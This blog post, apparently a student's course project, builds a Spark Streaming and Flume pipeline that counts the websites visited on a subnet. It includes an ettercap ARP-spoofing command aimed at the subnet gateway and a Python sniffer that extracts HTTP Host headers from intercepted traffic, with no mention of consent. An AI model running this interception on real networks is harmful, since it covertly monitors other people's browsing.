
A small application built with Spark Streaming + Flume

2016-10-01 15:58
This was a small assignment for this semester's distributed systems course. At the final presentation the teacher remarked that the application does not really have much to do with distributed computing, but I spent time building it, so I am sharing it anyway.

The application collects statistics on the network activity of a subnet over a period of time: which websites were visited, and how often.

1. Preparation

I did this on Ubuntu. The packages installed include:
apache-flume-1.5.2-bin.tar.gz   jdk-7u79-linux-x64.tar.gz  spark-1.3.1-bin-hadoop2.6.tgz

apache-maven-3.3.3-bin.tar.gz  hadoop-2.6.0.tar.gz          scala-2.11.6.tgz 

As for configuring the environment variables, I followed a guide I found online.
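For reference, here is a minimal sketch of what that boils down to in ~/.bashrc, assuming everything was unpacked under /usr/local; the exact paths are only examples and must match your own layout:

# example paths only; adjust to where you unpacked the tarballs
export JAVA_HOME=/usr/local/jdk1.7.0_79
export SCALA_HOME=/usr/local/scala-2.11.6
export HADOOP_HOME=/usr/local/hadoop-2.6.0
export SPARK_HOME=/usr/local/spark-1.3.1-bin-hadoop2.6
export FLUME_HOME=/usr/local/flume
export MAVEN_HOME=/usr/local/apache-maven-3.3.3
export PATH=$PATH:$JAVA_HOME/bin:$SCALA_HOME/bin:$HADOOP_HOME/bin:$SPARK_HOME/bin:$FLUME_HOME/bin:$MAVEN_HOME/bin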

2. Configuring Flume and Spark

The pom.xml file is as follows:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>flume</groupId>
  <artifactId>Flume-SparkStreaming</artifactId>
  <version>1.0</version>
  <packaging>jar</packaging>

  <dependencies>
    <dependency>
      <groupId>org.apache.spark</groupId>
      <artifactId>spark-core_2.10</artifactId>
      <version>1.3.1</version>
      <scope>provided</scope>
    </dependency>
    <dependency>
      <groupId>org.apache.spark</groupId>
      <artifactId>spark-streaming_2.10</artifactId>
      <version>1.3.1</version>
      <scope>provided</scope>
    </dependency>
    <dependency>
      <groupId>org.apache.spark</groupId>
      <artifactId>spark-streaming-flume_2.10</artifactId>
      <version>1.3.1</version>
    </dependency>
    <dependency>
      <groupId>org.json</groupId>
      <artifactId>json</artifactId>
      <version>20141113</version>
    </dependency>
  </dependencies>

  <build>
    <plugins>
      <plugin>
        <artifactId>maven-assembly-plugin</artifactId>
        <configuration>
          <archive>
            <manifest>
              <mainClass></mainClass>
            </manifest>
          </archive>
          <descriptorRefs>
            <descriptorRef>jar-with-dependencies</descriptorRef>
          </descriptorRefs>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>


The flume-conf.properties file:
#netcat to avro
# Name the components on this agent
a2.sources = r2
a2.sinks = k2
a2.channels = c2

# Describe/configure the source
a2.sources.r2.type = netcat
a2.sources.r2.bind = localhost
a2.sources.r2.port = 44444

# Describe the sink
a2.sinks.k2.type = avro
a2.sinks.k2.hostname = localhost
a2.sinks.k2.port = 42424

# Use a channel which buffers events in memory
a2.channels.c2.type = memory
a2.channels.c2.capacity = 1000
a2.channels.c2.transactionCapacity = 100

# Bind the source and sink to the channel
a2.sources.r2.channels = c2
a2.sinks.k2.channel = c2


The parameters are all explained in the official Flume documentation, so I won't try to restate them here.
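Once the agent is up (see section 7), the netcat source can be smoke-tested by hand; the hostname below is just a made-up line of input:

# send one fake "domain" to the netcat source; the source answers OK for each event it accepts
echo "www.example.com" | nc localhost 44444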

In Spark's conf directory, remember to put log4j.properties and the slaves file into effect by removing the .template suffix from their names.
The contents of log4j.properties are:

# Set everything to be logged to the console
log4j.rootCategory=ERROR, console
log4j.appender.console=org.apache.log4j.ConsoleAppender
log4j.appender.console.target=System.err
log4j.appender.console.layout=org.apache.log4j.PatternLayout
log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{1}: %m%n

# Settings to quiet third party logs that are too verbose
log4j.logger.org.eclipse.jetty=WARN
log4j.logger.org.eclipse.jetty.util.component.AbstractLifeCycle=ERROR
log4j.logger.org.apache.spark.repl.SparkIMain$exprTyper=INFO
log4j.logger.org.apache.spark.repl.SparkILoop$SparkILoopInterpreter=INFO

3. ARP spoofing

I used the Ettercap tool; refer to its documentation for the details.
The command used is:
sudo ettercap -i eth0 -Tq -M arp:remote //172.18.217.254/     

Here, 172.18.217.254 is the gateway of my subnet.
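If you are unsure of your gateway address, it can be read from the routing table; this is a plain iproute2 query, nothing Ettercap-specific:

# the gateway address appears after "via" in the default route
ip route show default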

4. HTTP packet capture

The script is adapted from one found online, with small modifications to fit the needs of this application.
#!/usr/bin/env python
# Sniff outgoing HTTP requests and forward each Host header to the Flume netcat source.
import pcap
import dpkt
import re
import socket

# connection to the Flume netcat source defined in flume-conf.properties
mysock = socket.socket()
mysock.connect(('localhost', 44444))

def match(pre, line):
    p = re.compile(pre)
    m = p.match(line)
    return m

def main_pcap(p_time, p_data):
    out_format = "%s\t%s\t%s\t%s\t%s\tHTTP/%s"
    p = dpkt.ethernet.Ethernet(p_data)
    ret = None
    if p.data.__class__.__name__ == 'IP':
        ip_data = p.data
        src_ip = '%d.%d.%d.%d' % tuple(map(ord, list(ip_data.src)))
        dst_ip = '%d.%d.%d.%d' % tuple(map(ord, list(ip_data.dst)))
        if p.data.data.__class__.__name__ == 'TCP':
            tcp_data = p.data.data
            if tcp_data.dport == 80:
                if tcp_data.data:
                    try:
                        h = dpkt.http.Request(tcp_data.data)
                    except dpkt.UnpackError:
                        return
                    pre = "^/.*$"
                    http_headers = h.headers
                    host = h.headers['host']
                    url = host
                    # datetime srcip dstip GET /index.htm HTTP/1.1
                    ret = out_format % (p_time, src_ip, dst_ip, h.method, url, h.version)
                    # one domain per line, so Flume treats each request as a separate event
                    mysock.send(url)
                    mysock.send("\n")
    return ret

def main():
    pc = pcap.pcap()
    pc.setfilter('tcp port 80')
    for p_time, p_data in pc:
        ret = main_pcap(p_time, p_data)
        if ret:
            print ret

if __name__ == '__main__':
    main()
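The script needs root privileges to sniff, plus the pcap and dpkt Python modules. A rough way to get them on Ubuntu is shown below; the package names may differ between releases, and installing dpkt/pypcap via pip is an equivalent alternative:

# dpkt parses the HTTP requests, pypcap provides the "pcap" module imported above
sudo apt-get install python-dpkt python-pypcap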

5. The Spark program

Its main job is a word count over the domains received from Flume; the result is written out as JSON.
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements.  See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License.  You may obtain a copy of the License at
*
*    http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/

//package org.apache.spark.examples.streaming;

import org.apache.spark.SparkConf;
import org.apache.spark.api.java.function.Function;
import org.apache.spark.streaming.*;
import org.apache.spark.streaming.api.java.*;
import org.apache.spark.streaming.flume.FlumeUtils;
import org.apache.spark.streaming.flume.SparkFlumeEvent;
import org.apache.spark.api.java.function.*;
import org.apache.spark.api.java.JavaPairRDD;

import scala.Tuple2;

import java.util.List;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import org.json.JSONException;
import org.json.JSONStringer;
import org.json.JSONObject;

public final class JavaFlumeEventCount {
    private JavaFlumeEventCount() {
    }

    // Write the (domain, count) pairs of the current window out as a JSON array.
    public static void outputToJson(List<Tuple2<String, Integer>> listOfResults, String outputPath) {
        JSONStringer IpJson = new JSONStringer();
        IpJson.array();
        for (Tuple2<String, Integer> item : listOfResults) {
            IpJson.object();
            IpJson.key("Domain").value(item._1);
            IpJson.key("Count").value(item._2);
            IpJson.endObject();
        }
        IpJson.endArray();
        try {
            File outputFile = new File(outputPath);
            if (!outputFile.exists()) {
                outputFile.createNewFile();
            }
            FileWriter fw = new FileWriter(outputFile);
            BufferedWriter outBuffer = new BufferedWriter(fw);
            outBuffer.write(IpJson.toString());
            outBuffer.flush();
            outBuffer.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        if (args.length != 3) {
            System.err.println("Usage: JavaFlumeEventCount <host> <port> <Output Path>");
            System.exit(1);
        }
        String host = args[0];
        int port = Integer.parseInt(args[1]);
        final String outputPath = args[2];
        Duration batchInterval = new Duration(2000);
        SparkConf sparkConf = new SparkConf().setAppName("JavaFlumeEventCount");
        JavaStreamingContext ssc = new JavaStreamingContext(sparkConf, batchInterval);
        JavaReceiverInputDStream<SparkFlumeEvent> flumeStream = FlumeUtils.createStream(ssc, host, port);

        // print each incoming Flume event (useful for debugging)
        flumeStream.map(
            new Function<SparkFlumeEvent, String>() {
                @Override
                public String call(SparkFlumeEvent flumeEvent) {
                    return "Flume Event: " + flumeEvent.event().toString();
                }
            }
        ).print();

        // map: extract the domain from the event body and emit (domain, 1)
        JavaPairDStream<String, Integer> ipMap = flumeStream.mapToPair(
            new PairFunction<SparkFlumeEvent, String, Integer>() {
                @Override
                public Tuple2<String, Integer> call(SparkFlumeEvent flumeEvent) {
                    JSONObject jsonobj = new JSONObject(flumeEvent.event().toString());
                    JSONObject jsonobj_body = new JSONObject(jsonobj.getString("body"));
                    String domain = jsonobj_body.getString("bytes");
                    Tuple2<String, Integer> result = new Tuple2<String, Integer>(domain, 1);
                    return result;
                }
            });

        // reduce: sum the counts per domain over a 4-second window, sliding every 4 seconds
        JavaPairDStream<String, Integer> ipReduce = ipMap.reduceByKeyAndWindow(
            new Function2<Integer, Integer, Integer>() {
                @Override
                public Integer call(Integer c1, Integer c2) {
                    return c1 + c2;
                }
            }, new Duration(4000), new Duration(4000));

        // output: collect each windowed RDD and dump it to the JSON file
        ipReduce.foreachRDD(new Function<JavaPairRDD<String, Integer>, Void>() {
            @Override
            public Void call(JavaPairRDD<String, Integer> rdd) {
                List<Tuple2<String, Integer>> listOfResults = rdd.collect();
                outputToJson(listOfResults, outputPath);
                return null;
            }
        });

        ssc.start();
        // keep the driver alive while the streaming job runs
        ssc.awaitTermination();
    }
}


Because I commented out the line

package org.apache.spark.examples.streaming;

the source file no longer has to sit in a deeply nested package directory; it simply goes under
/code/src/main/java/***.java

The packet-capture script above and pom.xml are both placed under code/.
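With that layout, building the fat jar that the spark-submit command in section 7 expects looks roughly like this (the assembly plugin configured in pom.xml adds the -jar-with-dependencies suffix):

cd code
mvn clean package assembly:single
# result: target/Flume-SparkStreaming-1.0-jar-with-dependencies.jar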

6. Displaying the results in a web page

The page is also adapted from code found online, with a few quick changes.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Fetch data with getJSON</title>
<script type="text/javascript" src="js/jquery-1.8.2.min.js"></script>
<style type="text/css">
#divframe{ border:1px solid #999; width:500px; margin:0 auto;}
.loadTitle{ background:#CCC; height:30px;}
</style>
<script type="text/javascript">
$(function(){
    $("#btn").click(function(){
        $.getJSON("IpCount.json", function(data){
            var $jsontip = $("#jsonTip");
            var strHtml = "";          // accumulates the generated markup
            $jsontip.empty();          // clear any previous results
            $.each(data, function(infoIndex, info){
                strHtml += "Domain:" + info["Domain"] + "<br>";
                strHtml += "Count:" + info["Count"] + "<br>";
                strHtml += "<hr>";
            });
            $jsontip.html(strHtml);    // render the formatted results
        });
    });
});
</script>
</head>

<body>
<div id="divframe">
    <div class="loadTitle">
        <input type="button" value="Fetch data" id="btn"/>
    </div>
    <div id="jsonTip">
    </div>
</div>
</body>
</html>
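The page requests IpCount.json with a relative URL, so it has to live in the same Tomcat directory that the Spark job writes to (webapps/examples in the spark-submit command of section 7). A quick sanity check, assuming Tomcat runs on its default port:

# the Spark job rewrites this file every window, so repeated requests should show changing counts
curl http://localhost:8080/examples/IpCount.json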

7. Running

ARP spoofing:
sudo ettercap -i eth0 -Tq -M arp:remote //172.18.217.254/ 

Running Spark:
#!/usr/bin/env bash

spark-submit --class JavaFlumeEventCount target/Flume-SparkStreaming-1.0-jar-with-dependencies.jar localhost 42424 ../package/tomcat7/webapps/examples/IpCount.json

Running Flume:
#!/usr/bin/env bash

flume-ng agent --conf /usr/local/flume/conf/ --conf-file /usr/local/flume/conf/flume-conf.properties --name a2 -Dflume.root.logger=INFO,console

HTTP packet capture:
sudo python http.py

Start the pieces in the order listed above: the Spark job must be listening on port 42424 before Flume's avro sink can deliver events to it, and the Flume agent's netcat source must be up on port 44444 before the capture script can connect. Finally, open the web page to see the results.
